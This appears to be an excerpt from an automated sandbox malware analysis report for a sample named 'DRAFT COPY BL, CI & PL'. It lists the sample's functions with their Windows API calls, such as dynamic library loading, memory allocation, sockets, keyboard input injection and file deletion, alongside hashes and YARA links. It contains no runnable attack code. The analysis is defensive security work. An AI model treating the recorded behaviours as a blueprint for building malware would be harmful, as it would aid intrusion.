                                                                • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00934C56
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: AddressLibraryLoadProc
                                                                • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                • API String ID: 2574300362-1355242751
                                                                • Opcode ID: b7c94fd9564cad5f33c47be308cc57b1864560e7e633b7b00e0420291e41d633
                                                                • Instruction ID: 00935a47313398c1a45161349ac122eeb1f9cdb58cf5c154fd80a4f16fbb01ad
                                                                • Opcode Fuzzy Hash: b7c94fd9564cad5f33c47be308cc57b1864560e7e633b7b00e0420291e41d633
                                                                • Instruction Fuzzy Hash: 23D01230524713CFD7245F36DE1864676D8AF05365F12CC79D4D6D6160E670D880CA50
                                                                Function 009B0DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LoadLibraryA.KERNEL32(advapi32.dll,?,009B1039), ref: 009B0DF5
                                                                • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 009B0E07
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: AddressLibraryLoadProc
                                                                • String ID: RegDeleteKeyExW$advapi32.dll
                                                                • API String ID: 2574300362-4033151799
                                                                • Opcode ID: 10abdb8c7159caf5c1aa6cdea43ce828877715d5cf89e54d687eef2a188cbe0c
                                                                • Instruction ID: e672d0965c4460be091631302786d8b7ceb42a963465237ba77eced5a01d2c87
                                                                • Opcode Fuzzy Hash: 10abdb8c7159caf5c1aa6cdea43ce828877715d5cf89e54d687eef2a188cbe0c
                                                                • Instruction Fuzzy Hash: 4AD01770524726CFD7219F7ACE096C776E9AF84366F11CC3EE896D2150EAB0E890CA50
                                                                Function 009A90E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LoadLibraryA.KERNEL32(kernel32.dll,00000001,009A8CF4,?,009BF910), ref: 009A90EE
                                                                • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 009A9100
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: AddressLibraryLoadProc
                                                                • String ID: GetModuleHandleExW$kernel32.dll
                                                                • API String ID: 2574300362-199464113
                                                                • Opcode ID: 0a101217ddd95d3733a5c02be09d470be5c748a39f5b8faad2be0a8cfd0ef9ef
                                                                • Instruction ID: 381d0baf37d896832c4bc470d07dc1c9d84a7e64b7e1af92bb4af0c7c94928ee
                                                                • Opcode Fuzzy Hash: 0a101217ddd95d3733a5c02be09d470be5c748a39f5b8faad2be0a8cfd0ef9ef
                                                                • Instruction Fuzzy Hash: EFD0173452C723CFDB209F79DD2C64676E8AF46365B12CC3AD49AD6590FA70C880CA90
                                                                Function 00971714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: LocalTime__swprintf
                                                                • String ID: %.3d$WIN_XPe
                                                                • API String ID: 2070861257-2409531811
                                                                • Opcode ID: ab519a8f75d1de73fff65d0eb389fa9b02b6cb3119ca19d38fad3a63039fb068
                                                                • Instruction ID: 5d0c7112710cc2117bd1fac66aacc78e52c185bf8fa1a023a094c91ed5898777
                                                                • Opcode Fuzzy Hash: ab519a8f75d1de73fff65d0eb389fa9b02b6cb3119ca19d38fad3a63039fb068
                                                                • Instruction Fuzzy Hash: 9AD05B7380910DFBC709D7959C89CFD73BCA758311F104D52F80AE2040E2398B54EB25
                                                                Function 0098717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: df0a715809004b0fdee3d6579f3ed48b845bb43344b55781d8e7cc8a693c42df
                                                                • Instruction ID: 38087b49eb0c2b96a534543b6df802fdf8179399d1fb5f5fe7d57658ec6c85e8
                                                                • Opcode Fuzzy Hash: df0a715809004b0fdee3d6579f3ed48b845bb43344b55781d8e7cc8a693c42df
                                                                • Instruction Fuzzy Hash: 8FC15C75A04216EFCB14DFA4C884AAEFBB9FF48314B248599E815DB361D730ED81DB90
                                                                Function 009AE02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CharLowerBuffW.USER32(?,?), ref: 009AE0BE
                                                                • CharLowerBuffW.USER32(?,?), ref: 009AE101
                                                                  • Part of subcall function 009AD7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 009AD7C5
                                                                • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 009AE301
                                                                • _memmove.LIBCMT ref: 009AE314
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: BuffCharLower$AllocVirtual_memmove
                                                                • String ID:
                                                                • API String ID: 3659485706-0
                                                                • Opcode ID: 9114abe876ebcaba45a2d6a15530a911398595d98b824d219c2c23384dfbc372
                                                                • Instruction ID: eee6529ba5c11a116d3f9b51cdcae5ec9727e5a8d136a97ec1a14ed49a036ea7
                                                                • Opcode Fuzzy Hash: 9114abe876ebcaba45a2d6a15530a911398595d98b824d219c2c23384dfbc372
                                                                • Instruction Fuzzy Hash: F4C136716083119FC714DF28C480A6ABBE4FF8A714F14896EF8999B351D771E946CF82
                                                                Function 009A8093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CoInitialize.OLE32(00000000), ref: 009A80C3
                                                                • CoUninitialize.OLE32 ref: 009A80CE
                                                                  • Part of subcall function 0098D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0098D5D4
                                                                • VariantInit.OLEAUT32(?), ref: 009A80D9
                                                                • VariantClear.OLEAUT32(?), ref: 009A83AA
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                • String ID:
                                                                • API String ID: 780911581-0
                                                                • Opcode ID: c605b5d19477f588521454cfa6dd47b962049a5b0fb724bf471af81cc2479122
                                                                • Instruction ID: 3460d1554ee0c28c9b4564fe688456076a1098a51c2da7891f6863431a35e0ff
                                                                • Opcode Fuzzy Hash: c605b5d19477f588521454cfa6dd47b962049a5b0fb724bf471af81cc2479122
                                                                • Instruction Fuzzy Hash: 7BA149756047019FCB00DF68C885B2AB7E4BF8A764F144859F99A9B3A1CB74ED05CF82
                                                                Function 00987530 Relevance: 6.2, APIs: 4, Instructions: 231COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,009C2C7C,?), ref: 009876EA
                                                                • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,009C2C7C,?), ref: 00987702
                                                                • CLSIDFromProgID.OLE32(?,?,00000000,009BFB80,000000FF,?,00000000,00000800,00000000,?,009C2C7C,?), ref: 00987727
                                                                • _memcmp.LIBCMT ref: 00987748
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: FromProg$FreeTask_memcmp
                                                                • String ID:
                                                                • API String ID: 314563124-0
                                                                • Opcode ID: 01ba31a92dc29113419822b2ea6289253b1316a6a56337fca66d9b46cb020bab
                                                                • Instruction ID: 85e8367fa39ccbd558cb52ad499db6826df09ee2f5cd20feec9feffaeade9b6f
                                                                • Opcode Fuzzy Hash: 01ba31a92dc29113419822b2ea6289253b1316a6a56337fca66d9b46cb020bab
                                                                • Instruction Fuzzy Hash: BA81D775A00109EFCB04DFE4C984EEEB7B9FF89315F204598E516AB250DB71AE06CB61
                                                                Function 0098687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Variant$AllocClearCopyInitString
                                                                • String ID:
                                                                • API String ID: 2808897238-0
                                                                • Opcode ID: a83e91cd5bdeb0a278d3369f37dd441d5d41f904c1bacae4f1936b9152b26407
                                                                • Instruction ID: ceecde25e205ff88198a991da1813c2bec1d102ae9a07af1bf1410a6e1fb9206
                                                                • Opcode Fuzzy Hash: a83e91cd5bdeb0a278d3369f37dd441d5d41f904c1bacae4f1936b9152b26407
                                                                • Instruction Fuzzy Hash: F95170747143019ADB28FF65D895B2AB3E9AF85310F20D81FE696DF3D1DA74D8808B01
                                                                Function 009B97F4 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetWindowRect.USER32(00E8D798,?), ref: 009B9863
                                                                • ScreenToClient.USER32(00000002,00000002), ref: 009B9896
                                                                • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 009B9903
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Window$ClientMoveRectScreen
                                                                • String ID:
                                                                • API String ID: 3880355969-0
                                                                • Opcode ID: 27890ef90ff9a8100a13b75bf787c8f6f1030262b79ec3c66807decae3db5f13
                                                                • Instruction ID: 08344dfa0528266eeb3487f6a7c813c747ed37e3d030b7a99908d0f2348bcd00
                                                                • Opcode Fuzzy Hash: 27890ef90ff9a8100a13b75bf787c8f6f1030262b79ec3c66807decae3db5f13
                                                                • Instruction Fuzzy Hash: 4A514F34A10608EFCF14CF64CA84AEE7BB9FF45360F118269FA559B2A0D730AD41DB90
                                                                Function 00989A80 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00989AD2
                                                                • __itow.LIBCMT ref: 00989B03
                                                                  • Part of subcall function 00989D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00989DBE
                                                                • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00989B6C
                                                                • __itow.LIBCMT ref: 00989BC3
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: MessageSend$__itow
                                                                • String ID:
                                                                • API String ID: 3379773720-0
                                                                • Opcode ID: b84a94a445dcf6636d8d7f70d8aa27e9a82d9b75b7e4756f0487017b9b30186a
                                                                • Instruction ID: 186a47515f820e3d2c86bf333b044888e6a8a6c7a48bc2250ccda8002eae5dce
                                                                • Opcode Fuzzy Hash: b84a94a445dcf6636d8d7f70d8aa27e9a82d9b75b7e4756f0487017b9b30186a
                                                                • Instruction Fuzzy Hash: 99415174A00208ABDF25EF54D845BFEBBB9EF88764F040069F905A7391DB749E44CB61
                                                                Function 009A69AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • socket.WSOCK32(00000002,00000002,00000011), ref: 009A69D1
                                                                • WSAGetLastError.WSOCK32(00000000), ref: 009A69E1
                                                                  • Part of subcall function 00939837: __itow.LIBCMT ref: 00939862
                                                                  • Part of subcall function 00939837: __swprintf.LIBCMT ref: 009398AC
                                                                • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 009A6A45
                                                                • WSAGetLastError.WSOCK32(00000000), ref: 009A6A51
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$__itow__swprintfsocket
                                                                • String ID:
                                                                • API String ID: 2214342067-0
                                                                • Opcode ID: 3d6f51eac78e69180a0d5d8216e1d5f3c9dd9f2ebbd99b6f83b202109f30a7ea
                                                                • Instruction ID: 402eba30c8ef12f61336a7e151b1c35fcffc38fd4feae0df8abfe43f2b6ba0f4
                                                                • Opcode Fuzzy Hash: 3d6f51eac78e69180a0d5d8216e1d5f3c9dd9f2ebbd99b6f83b202109f30a7ea
                                                                • Instruction Fuzzy Hash: CD4162757402006FEB60AF24DC86F2A77A89B85B14F04C558FA59AF3D2DAB49D008B91
                                                                Function 009A641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,009BF910), ref: 009A64A7
                                                                • _strlen.LIBCMT ref: 009A64D9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: _strlen
                                                                • String ID:
                                                                • API String ID: 4218353326-0
                                                                • Opcode ID: dd8fc4cf10a315fc1dec9637721c14688aef7be49c7f172874ef393c0c9ff6b5
                                                                • Instruction ID: 022a100afa412787ddc743e84b5529809d4cbf0fa3d0882e29de3272f1e0a590
                                                                • Opcode Fuzzy Hash: dd8fc4cf10a315fc1dec9637721c14688aef7be49c7f172874ef393c0c9ff6b5
                                                                • Instruction Fuzzy Hash: 04417771A00104AFCB14FBA8DCD6FBEB7B9AF89310F148555F9199B292DB70AD04CB90
                                                                Function 0099B7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0099B89E
                                                                • GetLastError.KERNEL32(?,00000000), ref: 0099B8C4
                                                                • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0099B8E9
                                                                • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0099B915
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: CreateHardLink$DeleteErrorFileLast
                                                                • String ID:
                                                                • API String ID: 3321077145-0
                                                                • Opcode ID: 9e85402842b2cb07f7edaf533f461a77f2dd136081bb89e97a353adfdd949cd1
                                                                • Instruction ID: d4b95e0dc6035301ff8a3c7797ffc5e308ffecc87d2556cac59c8c8a80f894d5
                                                                • Opcode Fuzzy Hash: 9e85402842b2cb07f7edaf533f461a77f2dd136081bb89e97a353adfdd949cd1
                                                                • Instruction Fuzzy Hash: B8410239600610DFCB11EF19C584B59BBE5AF8A324F198098EC4AAB362CB74ED01DF91
                                                                Function 009B8851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 009B88DE
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: InvalidateRect
                                                                • String ID:
                                                                • API String ID: 634782764-0
                                                                • Opcode ID: 50fa4554b713cecc7370b207663a9ad863f4b95126676f66501b26a606e7bf8b
                                                                • Instruction ID: 6c164836fbf1c7e726583c488ede29e6abb114519c6bb0f13e3eea06b98d6e55
                                                                • Opcode Fuzzy Hash: 50fa4554b713cecc7370b207663a9ad863f4b95126676f66501b26a606e7bf8b
                                                                • Instruction Fuzzy Hash: 3931C134614108BFEF249A58CE45BFA7BADEB0E370F544512FA25E61A1CA70E940DB52
                                                                Function 009BAB37 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • ClientToScreen.USER32(?,?), ref: 009BAB60
                                                                • GetWindowRect.USER32(?,?), ref: 009BABD6
                                                                • PtInRect.USER32(?,?,009BC014), ref: 009BABE6
                                                                • MessageBeep.USER32(00000000), ref: 009BAC57
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Rect$BeepClientMessageScreenWindow
                                                                • String ID:
                                                                • API String ID: 1352109105-0
                                                                • Opcode ID: 700752a6ee5de2a28ca71b2be35b59df10c5563e7513b1b3fc3b838890513fe9
                                                                • Instruction ID: b1b99ba7484766d13a7b3726ef1789bd3d6d7251812d4bd25e13045ec8e371b7
                                                                • Opcode Fuzzy Hash: 700752a6ee5de2a28ca71b2be35b59df10c5563e7513b1b3fc3b838890513fe9
                                                                • Instruction Fuzzy Hash: 5D41AF30A04619DFCB11DF58CA84BA97BF5FF49360F1885A9E994DB260D730E841DB92
                                                                Function 00990AD6 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00990B27
                                                                • SetKeyboardState.USER32(00000080,?,00000001), ref: 00990B43
                                                                • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00990BA9
                                                                • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00990BFB
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
